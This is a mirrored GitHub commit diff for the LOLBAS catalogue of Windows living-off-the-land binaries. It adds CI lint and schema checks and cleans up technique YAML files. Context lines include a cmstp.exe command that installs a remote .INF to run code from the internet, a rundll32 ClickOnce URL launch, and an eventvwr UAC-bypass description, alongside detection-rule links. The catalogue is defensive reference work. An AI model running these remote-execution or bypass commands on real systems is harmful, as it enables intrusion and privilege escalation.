1
0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-04-25 16:23:00 +02:00

Merge pull request from xenoscr/master

YAML Linting & Schema Checks
This commit is contained in:
Conor Richard 2022-09-15 13:46:31 -04:00 committed by GitHub
commit 5e55bcb82e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
170 changed files with 640 additions and 632 deletions

8
.github/.yamllint vendored

@ -4,12 +4,12 @@ yaml-files:
- '*.yml' - '*.yml'
rules: rules:
new-line-at-end-of-file: new-line-at-end-of-file:
level: warning level: error
trailing-spaces: trailing-spaces:
level: warning level: error
line-length: line-length:
level: warning level: warning
new-lines: new-lines:
level: warning level: error
indentation: indentation:
level: warning level: error

@ -16,7 +16,7 @@ jobs:
- name: Change .yml to .md - name: Change .yml to .md
run: | run: |
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
mv yml/OSBinaries yml/Binaries mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts mv yml/OSScripts yml/Scripts

@ -1,19 +1,35 @@
--- ---
name: YAML Lint name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
on: on: [push,pull_request]
push:
branches:
- master
pull_request:
branches:
- master
jobs: jobs:
lintFiles: lintFiles:
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- uses: actions/checkout@v1 - uses: actions/checkout@v3
- name: yaml-lint - name: yaml-lint
uses: ibiqlik/action-yamllint@v3 uses: ibiqlik/action-yamllint@v3
with: with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint config_file: .github/.yamllint
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

35
.github/yaml-lint-reviewdog.yml.bak vendored Normal file

@ -0,0 +1,35 @@
---
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
on: [pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run yamllint
uses: reviewdog/action-yamllint@v1
with:
level: error
reporter: github-pr-review # Change reporter.
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

@ -23,4 +23,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Bart - Person: Bart
Handle: '@bartblaze' Handle: '@bartblaze'
---

@ -15,4 +15,3 @@ Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe' - Path: '%localappdata%\Whatsapp\Update.exe'
Detection: Detection:
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---

@ -25,4 +25,3 @@ Acknowledgement:
Handle: '@@vysecurity' Handle: '@@vysecurity'
- Person: Adam (Internals) - Person: Adam (Internals)
Handle: '@Hexacorn' Handle: '@Hexacorn'
---

118
YML-Schema.yml Normal file

@ -0,0 +1,118 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'

@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file)
Commands: Commands:
- Command: The command - Command: The command
Description: Description of the command Description: Description of the command
Aliases:
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
Usecase: A description of the usecase Usecase: A description of the usecase
Category: Execute Category: Execute
Privileges: Required privs Privileges: Required privs

@ -20,4 +20,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Wade Hickey - Person: Wade Hickey
Handle: '@notwhickey' Handle: '@notwhickey'
---

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: cpl - Person: cpl
Handle: '@cpl3h' Handle: '@cpl3h'
---

@ -23,7 +23,7 @@ Detection:
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
Resources: Resources:
- Link: https://freddiebarrsmith.com/at.txt - Link: https://freddiebarrsmith.com/at.txt
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
Acknowledgement: Acknowledgement:
- Person: 'Freddie Barr-Smith' - Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
Handle: Handle:
- Person: 'Xabier Ugarte-Pedrero' - Person: 'Xabier Ugarte-Pedrero'
Handle: Handle:
---

@ -14,8 +14,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
@ -27,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
---

@ -48,4 +48,3 @@ Acknowledgement:
Handle: '@aionescu' Handle: '@aionescu'
- Person: Asif Matadar - Person: Asif Matadar
Handle: '@d1r4c' Handle: '@d1r4c'
---

@ -46,7 +46,7 @@ Detection:
- IOC: bitsadmin creates new files - IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream - IOC: bitsadmin adds data to alternate data stream
Resources: Resources:
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement: Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@carnal0wnage' Handle: '@carnal0wnage'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ensar Samil - Person: Ensar Samil
Handle: '@sblmsrsn' Handle: '@sblmsrsn'
---

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: David Middlehurst - Person: David Middlehurst
Handle: '@dtmsecurity' Handle: '@dtmsecurity'
---

@ -75,4 +75,3 @@ Acknowledgement:
- Person: egre55 - Person: egre55
Handle: '@egre55' Handle: '@egre55'
- Person: Lior Adar - Person: Lior Adar
---

@ -21,8 +21,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
@ -34,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: r0lan - Person: r0lan
Handle: '@yeyint_mth' Handle: '@yeyint_mth'
---

@ -14,8 +14,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
Resources: Resources:
@ -24,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

@ -23,4 +23,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

@ -14,15 +14,13 @@ Commands:
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
@ -44,4 +42,3 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@NickTyrer' Handle: '@NickTyrer'
---

@ -29,4 +29,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: '@NtSetDefault' Handle: '@NtSetDefault'
---

@ -24,4 +24,3 @@ Acknowledgement:
Handle: '@hexacorn' Handle: '@hexacorn'
- Person: Wietze - Person: Wietze
Handle: '@wietze' Handle: '@wietze'
---

@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Windows\System32\control.exe - Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe - Path: C:\Windows\SysWOW64\control.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Ialle Teixeira - Person: Ialle Teixeira
Handle: '@NtSetDefault' Handle: '@NtSetDefault'
---

@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Gal Kristal - Person: Gal Kristal
Handle: '@gal_kristal' Handle: '@gal_kristal'
---

@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -17,7 +17,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
Resources: Resources:
@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@tim8288' Handle: '@tim8288'
- Person: Hai Vaknin - Person: Hai Vaknin
Handle: '@vakninhai' Handle: '@vakninhai'
---

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
@ -32,4 +32,3 @@ Acknowledgement:
Handle: '@dim0x69' Handle: '@dim0x69'
- Person: Nikhil SamratAshok - Person: Nikhil SamratAshok
Handle: '@nikhil_mitt' Handle: '@nikhil_mitt'
---

@ -50,7 +50,7 @@ Full_Path:
- Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
@ -66,5 +66,4 @@ Acknowledgement:
- Person: egre55 - Person: egre55
Handle: '@egre55' Handle: '@egre55'
- Person: Mike Cary - Person: Mike Cary
Handle: 'grayfold3d' Handle: '@grayfold3d'
---

@ -7,7 +7,7 @@ Commands:
- Command: eventvwr.exe - Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC bypass Category: UAC Bypass
Privileges: User Privileges: User
MitreID: T1548.002 MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@enigma0x3' Handle: '@enigma0x3'
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---

@ -29,7 +29,7 @@ Full_Path:
- Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
@ -41,4 +41,3 @@ Acknowledgement:
Handle: '@infosecn1nja' Handle: '@infosecn1nja'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@CyberRaiju' Handle: '@CyberRaiju'
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

@ -1,6 +1,6 @@
--- ---
Name: Extexport.exe Name: Extexport.exe
Description: Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
---

@ -1,6 +1,6 @@
--- ---
Name: Extrac32.exe Name: Extrac32.exe
Description: Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -54,4 +54,3 @@ Acknowledgement:
Handle: '@VakninHai' Handle: '@VakninHai'
- Person: Tamir Yehuda - Person: Tamir Yehuda
Handle: '@tim8288' Handle: '@tim8288'
---

@ -1,6 +1,6 @@
--- ---
Name: Findstr.exe Name: Findstr.exe
Description: Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -36,7 +36,7 @@ Full_Path:
- Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
Resources: Resources:
@ -45,4 +45,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -28,4 +28,3 @@ Acknowledgement:
Handle: '@Ocelotty6669' Handle: '@Ocelotty6669'
- Person: Malwrologist - Person: Malwrologist
Handle: '@DissectMalware' Handle: '@DissectMalware'
---

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Carlos Perez - Person: Carlos Perez
Handle: '@Carlos_Perez' Handle: '@Carlos_Perez'
---

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
Resources: Resources:
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@vector_sec' Handle: '@vector_sec'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
